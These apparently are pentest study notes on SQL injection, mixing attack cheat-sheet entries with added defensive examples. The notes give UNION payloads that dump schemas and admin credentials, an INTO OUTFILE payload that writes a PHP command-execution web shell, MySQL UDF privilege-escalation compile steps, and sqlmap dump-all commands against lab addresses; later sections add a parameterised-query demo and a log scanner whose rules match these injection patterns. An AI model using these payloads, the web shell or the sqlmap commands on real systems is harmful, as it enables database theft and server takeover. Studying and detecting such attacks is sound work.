
group_concat concat

SQL injection
sqli-lab
Less 1
Sqlite3
mysql privilege escalation
sqlmap

group_concat concat
MySQL's GROUP_CONCAT() function concatenates the strings of a group into a single string, with various options.
Usage of group_concat and concat

SQL injection
SHOW GRANTS;
SHOW VARIABLES;

Dump databases: (information_schema,ctftraining,mysql,performance_schema,test,news)
?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata

Dump tables: (admin,contents)
?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"

Dump columns: (id,username,password)
?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"

Dump passwords:
?id=-1 UNION SELECT 1,group_concat(username,0x3a,password SEPARATOR '<br>') from admin --+

SEPARATOR '<br>' puts each row on its own line. SEPARATOR is an option of group_concat, not of concat, so the aggregate must be group_concat here.

Command execution via SQL (writing a file with INTO OUTFILE)
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/command.php' -- -'
This only works when the database account holds the FILE privilege and secure_file_priv does not restrict where files may be written; checking both is the defensive control.
sqli-lab

Detailed walkthrough of SQL injection

Less 1
Input ?id=1
Confirm the parameter is injectable and that the closing character is a single quote:
' OR 1=1-- -
id=1' and '1'='1
id=1' and '1'='2
Find the number of columns: id=0' order by 3 --
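To show why the probes in this section and in the previous one succeed, and what stops them, here is an added example that is not part of the original notes. It builds a throwaway SQLite database in memory (sample rows, constructed for the demo; the table names news and admin mirror the notes, the values are made up) and runs the same Less-1 style inputs against two lookups: one that formats the id into the query string, and one that binds it as a parameter. SQLite stands in for MySQL; its `--` comment syntax matches the `-- ` form used above.

```python
import sqlite3


def build_demo_db():
    """Constructed schema and sample rows (not real data); mirrors the notes' news/admin tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news  VALUES (1, 'first post'), (2, 'second post');
        INSERT INTO admin VALUES (1, 'admin', 'sample-password');
    """)
    return conn


def lookup_vulnerable(conn, id_param):
    """Builds the query by string formatting; the single-quoted context is the Less-1 shape."""
    sql = f"SELECT id, title FROM news WHERE id = '{id_param}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """Same query with a bound parameter: whatever the input contains, it is compared as one value."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (id_param,)).fetchall()


def run_probe(lookup, conn, payload):
    """Returns ('rows', rows) or ('error', message).

    The ORDER BY column-count probe relies on the difference: ORDER BY past the
    number of selected columns raises an error, ORDER BY within it does not.
    """
    try:
        return ("rows", lookup(conn, payload))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


# The probes from the notes, in the order a tester would try them.
PROBES = [
    "1",
    "1' and '1'='1",
    "1' and '1'='2",
    "0' order by 2 --",
    "0' order by 3 --",
    "-1' UNION SELECT username, password FROM admin-- -",
]

if __name__ == "__main__":
    conn = build_demo_db()
    for payload in PROBES:
        vuln = run_probe(lookup_vulnerable, conn, payload)
        safe = run_probe(lookup_safe, conn, payload)
        print(f"{payload!r:55} vulnerable={vuln}  safe={safe}")
```

Against the formatted query the tautology pair returns a row for '1'='1' and nothing for '1'='2', ORDER BY 3 errors while ORDER BY 2 does not (so the column count is 2), and the UNION row comes back from admin. Against the bound query every one of those inputs is treated as a literal id that matches nothing, with no error, which is what a log of "no rows" for odd-looking ids looks like on a patched endpoint.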

Sqlite3
sqlite3 <database-name>
List tables:
.tables
List a table's columns:
PRAGMA table_info(customers);
SELECT * FROM customers;

mysql privilege escalation

raptor
privilege-escalation-with-mysql-user-defined-functions
show variables like '%plugin%';
show variables like '%secure_file_priv%';
gcc -g -c raptor_udf2.c  # compile the UDF source
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc  # create the shared library (.so)
The two SHOW VARIABLES checks are also the hardening checks: the UDF route needs a writable plugin_dir and a secure_file_priv that allows writing there, so a restricted secure_file_priv and a plugin_dir the mysql OS user cannot write to close it.

sqlmap
sqlmap -u "http://10.11.1.251/wp/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --risk 3 --level 5 -p wpas_keys --tamper space2comment --dump-all
sqlmap -u http://10.11.1.252:8000/index.php --method POST --data "username=111&password=111&submit=Log+In" -p username --not-string="Warning" --dbms=MySQL --technique=TB --current-db

Dump everything
sqlmap -u http://10.11.1.229/ --method POST --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=l5vcPcJJzaGfzbhtZ7p%2BNf588f5oMX4PDcBef0czH0HrvIngZvck4L1DYfrfegpG%2Buk%2BvRuaRoVSM7KpSYNA6w7TOF6%2Fhy0xgXCdiDreiJxHKh38xyerlnewzSjpwNPtKCNWfZJCZv8Pj%2BntaqAv7Yx%2Byqpsup9Tcy4skmhG84I%3D&__VIEWSTATEGENERATOR=A9B807B2&__EVENTVALIDATION=hT%2FFpZW38dvYomvpIzbtE2spgtyuFBbjpmKa2Tx23%2BMIkY1B01B2N9HvYdHKqyOA7fhqZ2WLtEJbuByvwx0FRZRMHpik3e%2BpTuFq8TfPC7Y%2F6dImG2QeY7wH9HbJgugU4HfkoiEAZPx4oaBcChxCw%2BPKPaxKKDd%2B1qjr92LcV8A%3D&ctl00%24MainContent%24UsernameBox=11&ctl00%24MainContent%24emailBox=11%4011.com&ctl00%24MainContent%24submit=Submit" -p xxxx --dbms=mssql --batch --dump-all --threads 5 --technique=EB
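From the defender's side, the payload shapes used throughout these notes (UNION SELECT, information_schema lookups, group_concat, ORDER BY column counting, quote tautologies) and sqmap's default User-Agent are all visible in a web server's access log. The following is an added example, not part of the original notes: a small scanner over combined-format log lines that URL-decodes each request path, matches it against those shapes, and groups the hits per source IP. The four log lines are constructed for the demo (addresses, timestamps and the "sqlmap/1.x" User-Agent string are made up; real sqlmap sends its own version there).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of combined-format access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=-1%20UNION%20SELECT%201,'
    'group_concat(schema_name)%20from%20information_schema.schemata HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=0%27%20order%20by%203%20--+ HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.12 - - [01/Jan/2024:10:00:03 +0000] "POST /index.php HTTP/1.1" 200 300 "-" "sqlmap/1.x (https://sqlmap.org)"',
]

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Rules applied to the URL-decoded path (case-insensitive). Names are local labels, not a standard.
REQUEST_RULES = [
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("group_concat", re.compile(r"group_concat\s*\(", re.I)),
    ("order_by_probe", re.compile(r"order\s+by\s+\d+", re.I)),
    ("into_outfile", re.compile(r"into\s+(?:out|dump)file", re.I)),
    ("quote_tautology", re.compile(r"'\s*(?:and|or)\s+'?\d+'?\s*=\s*'?\d+", re.I)),
    ("sql_comment", re.compile(r"--\s|--$|/\*")),
]
# Rules applied to the User-Agent header.
UA_RULES = [
    ("sqlmap_user_agent", re.compile(r"\bsqlmap\b", re.I)),
]


def parse_line(line):
    """Split one combined-format line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_request(path, user_agent):
    """Return the sorted list of rule names that match this request.

    unquote_plus() decodes %XX escapes and '+' so that '--+' becomes '-- ' and
    'UNION%20SELECT' becomes 'UNION SELECT' before the patterns run.
    """
    decoded = unquote_plus(path)
    hits = [name for name, rx in REQUEST_RULES if rx.search(decoded)]
    hits += [name for name, rx in UA_RULES if rx.search(user_agent)]
    return sorted(hits)


def summarize(lines):
    """Map each source IP to the set of rules its requests triggered; quiet IPs are omitted."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = scan_request(rec["path"], rec["ua"])
        if hits:
            per_ip.setdefault(rec["ip"], set()).update(hits)
    return per_ip


if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE_LOG).items():
        print(f"{ip:12} {', '.join(sorted(rules))}")
```

A single order_by_probe hit is weak evidence on its own (legitimate sorting parameters can look similar), so the per-IP grouping matters: one address that trips the column-count probe, then UNION SELECT and information_schema within seconds, is the enumeration sequence from the SQL injection section above and is worth an alert, while the sqlmap User-Agent is a trivially changed but still commonly left-in giveaway.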
